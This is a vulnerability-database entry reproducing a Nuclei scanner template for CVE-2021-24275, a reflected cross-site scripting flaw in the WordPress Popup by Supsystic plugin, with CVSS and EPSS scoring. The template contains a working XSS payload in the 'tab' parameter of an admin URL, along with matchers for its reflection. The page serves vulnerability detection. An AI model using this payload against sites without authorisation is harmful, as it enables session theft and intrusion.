Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-24275
HistorySep 28, 2021 - 5:03 p.m.

Popup by Supsystic <1.10.5 - Cross-Site scripting

2021-09-2817:03:24
ProjectDiscovery
github.com
1

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.002 Low

EPSS

Percentile

60.8%

WordPress Popup by Supsystic before 1.10.5 did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected cross-site scripting issue.

id: CVE-2021-24275

info:
  name: Popup by Supsystic <1.10.5 - Cross-Site scripting
  author: dhiyaneshDK
  severity: medium
  description: WordPress Popup by Supsystic before 1.10.5 did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected cross-site scripting issue.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Upgrade to Popup by Supsystic version 1.10.5 or later to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/efdc76e0-c14a-4baf-af70-9d381107308f
    - http://packetstormsecurity.com/files/164311/WordPress-Popup-1.10.4-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24275
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24275
    cwe-id: CWE-79
    epss-score: 0.00231
    epss-percentile: 0.60494
    cpe: cpe:2.3:a:supsystic:popup:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: supsystic
    product: popup
    framework: wordpress
  tags: cve2021,cve,wpscan,packetstorm,wordpress,wp-plugin,supsystic

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '</script><script>alert(document.domain)</script>'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502202e8b612008e7b0431de014a13bfb6d727ae9e6d71ea87d4d29754936012f118e022100bb024808d77aed7e62c623b62b8e653220673c8f814fb7575dfa7f7df1056248:922c64590222798bb761d5b6d8e72950

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.002 Low

EPSS

Percentile

60.8%